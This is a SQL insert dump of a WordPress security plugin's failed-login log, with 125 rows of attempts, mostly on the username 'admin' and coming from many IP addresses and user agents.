INSERT INTO `zdenl_wflogins` (`id`, `hitID`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(1, 20, 1581542082.525673, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955be84, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(2, 49, 1581811876.735557, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a465, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(3, 50, 1581824269.231956, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffca898df3, 'Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2789.83 Safari/537.36'),
(4, 86, 1581843413.835745, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff510a03ba, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0'),
(5, 95, 1581864436.701540, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbf252fda, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(6, 98, 1581885411.592985, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffca898d79, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2674.90 Safari/537.36'),
(7, 102, 1581905182.278550, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb758da91, 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(8, 105, 1581926019.387045, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb4b7f6ad, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0'),
(9, 109, 1581945615.745080, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb4b7fbf2, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),
(10, 112, 1581966494.020820, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa85a8545, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.82 Safari/537.36'),
(11, 120, 1582006750.297806, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffba2e2d7a, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.13 Safari/537.36'),
(12, 122, 1582026649.456435, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff735463f6, 'Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0'),
(13, 138, 1582061370.301065, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff4b77daf6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(14, 140, 1582062270.752268, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa747a2f5, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(15, 141, 1582062473.645356, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff44b73c9c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(16, 145, 1582063361.641150, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68f82b48, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(17, 146, 1582063986.065637, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8b3bab2e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(18, 147, 1582064207.192434, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa290523e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(19, 149, 1582065078.512652, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9448cf87, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(20, 150, 1582065722.236259, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23e1d383, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(21, 151, 1582065959.864577, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e5d7cd2, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(22, 152, 1582066754.371034, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbca368a3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(23, 153, 1582066757.801542, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbca368a3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(24, 154, 1582066872.434934, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2f34725a, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(25, 155, 1582067022.164263, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9775132, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(26, 156, 1582067509.584988, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff25bbc571, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(27, 157, 1582067751.353321, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff225764d8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(28, 158, 1582068203.785483, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2dee79f7, 'Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0'),
(29, 159, 1582068483.533710, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5b868e39, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(30, 160, 1582068613.434914, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23f7a8db, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(31, 161, 1582069427.622576, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5f83e86b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(32, 162, 1582069600.758486, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff1b7bddc5, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(33, 163, 1582070500.330263, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff614aec09, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(34, 166, 1582071198.371699, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5beac2f6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(35, 167, 1582072207.022300, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8b3b1174, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(36, 168, 1582072397.202850, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff44b73c9c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(37, 169, 1582073172.354078, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8b3bab2e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(38, 170, 1582073359.495894, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff771c4ae6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(39, 171, 1582074278.091454, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd505b1d7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(40, 172, 1582075030.453937, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff25bbc571, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(41, 173, 1582075219.453840, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23e4a273, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(42, 176, 1582076007.240942, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff55d0b980, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(43, 176, 1582076010.267386, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff55d0b980, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(44, 177, 1582076198.073797, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff92b9b76b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(45, 177, 1582076201.105196, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff92b9b76b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(46, 178, 1582076639.563120, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955eef4, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(47, 179, 1582077180.008258, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbca6b58b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(48, 180, 1582078159.875803, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23f37314, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(49, 181, 1582078911.160947, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc0a9e386, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(50, 182, 1582079137.640884, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68ec7ff7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(51, 185, 1582079931.664514, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffcebd9db7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(52, 186, 1582080128.295031, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2f4b80d8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(53, 187, 1582080901.682698, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68ee49d8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(54, 187, 1582080904.694411, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68ee49d8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(55, 188, 1582081179.365479, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff78370ee7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(56, 188, 1582081180.143943, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff78370ee7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(57, 189, 1582081916.845894, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff671bee29, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(58, 190, 1582082118.832684, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbca5fa86, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(59, 191, 1582082914.117810, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9de699cb, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(60, 192, 1582083105.780714, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd9b64924, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(61, 193, 1582083912.330504, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9df54af4, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(62, 194, 1582084217.429145, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff34824e07, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(63, 197, 1582084909.506365, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e04d3c8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(64, 198, 1582085205.103193, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9f413630, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(65, 199, 1582085932.155889, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa63e6463, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(66, 199, 1582085937.170515, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa63e6463, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(67, 200, 1582086223.473401, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6751548c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(68, 200, 1582086226.526550, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6751548c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(69, 201, 1582086967.542016, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e5d3b23, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(70, 202, 1582087214.791290, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffcebd9db7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(71, 203, 1582087374.108461, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffaaf72985, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0'),
(72, 204, 1582087916.246375, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff71a121f0, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(73, 205, 1582087927.699547, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(74, 206, 1582088164.146288, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff339e7864, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(75, 209, 1582088774.936026, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff96a4fafb, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(76, 210, 1582088957.099785, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8b3bb9ad, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(77, 211, 1582089572.948315, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff323fa7b8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(78, 212, 1582089764.045045, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa516bf81, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(79, 213, 1582090326.173982, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff40166843, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(80, 214, 1582090536.460263, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff689cede7, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(81, 215, 1582091278.014027, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6bb31344, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(82, 216, 1582091769.894327, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5beac2f6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(83, 217, 1582091998.818046, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e04d3c8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(84, 218, 1582092530.718284, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2ce357fb, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(85, 219, 1582092714.270723, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb01f8649, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(86, 222, 1582093236.926230, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff4b77daf6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(87, 223, 1582093434.080530, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff92b98ec8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(88, 223, 1582093434.776811, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff92b98ec8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(89, 224, 1582093968.438824, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3ed2b904, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(90, 225, 1582094101.956802, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9505d19f, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(91, 226, 1582094639.949224, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb2804479, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(92, 227, 1582094782.764325, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff224cac9d, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(93, 228, 1582095292.270299, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff953865ef, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(94, 229, 1582095464.958486, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff84949065, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(95, 230, 1582096067.451141, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3326259a, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(96, 232, 1582096900.426194, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff67f7d949, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(97, 233, 1582097229.825903, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e5dd342, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(98, 236, 1582097882.039977, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb2805a09, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(99, 237, 1582098122.766545, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff67532465, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(100, 238, 1582098749.521321, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2d77d40e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(101, 239, 1582098947.177059, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc907d232, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(102, 240, 1582099454.787366, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7476f10, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(103, 241, 1582099647.337687, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff84941c14, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(104, 242, 1582100228.642915, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff33263f45, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(105, 243, 1582100506.734319, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb2806797, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(106, 244, 1582101298.349981, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff670fe20e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(107, 245, 1582101863.743608, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd5205b47, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(108, 250, 1582102949.947578, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc063279d, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(109, 255, 1582107716.947542, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc0a6dd41, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2784.95 Safari/537.36'),
(110, 267, 1582127659.891435, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffca898d83, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'),
(111, 276, 1582147561.790302, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffca899b41, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2850.87 Safari/537.36'),
(112, 289, 1582167017.286786, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2dee79af, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Win64; x64; Trident/6.0)'),
(113, 300, 1582184994.114306, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff83a12211, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(114, 312, 1582203295.126254, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb4b7f409, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2803.7 Safari/537.36'),
(115, 323, 1582221295.660271, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff73546315, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)'),
(116, 638, 1582374958.609845, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd9a5ccbe, 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0)'),
(117, 642, 1582388335.740070, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc8c0d1f2, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.90 Safari/537.36'),
(118, 644, 1582401678.783179, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff73545cc6, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0'),
(119, 646, 1582411161.489532, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffff05bc3e19, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),
(120, 652, 1582414928.088398, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb168fe43, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/6.0)'),
(121, 682, 1582478454.469278, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff29266176, 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/4.0)'),
(122, 686, 1582491206.341766, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(123, 687, 1582491252.206493, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffca899b5f, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(124, 688, 1582504104.372676, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff510a0313, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0'),
(125, 699, 1582535997.412358, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a467, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
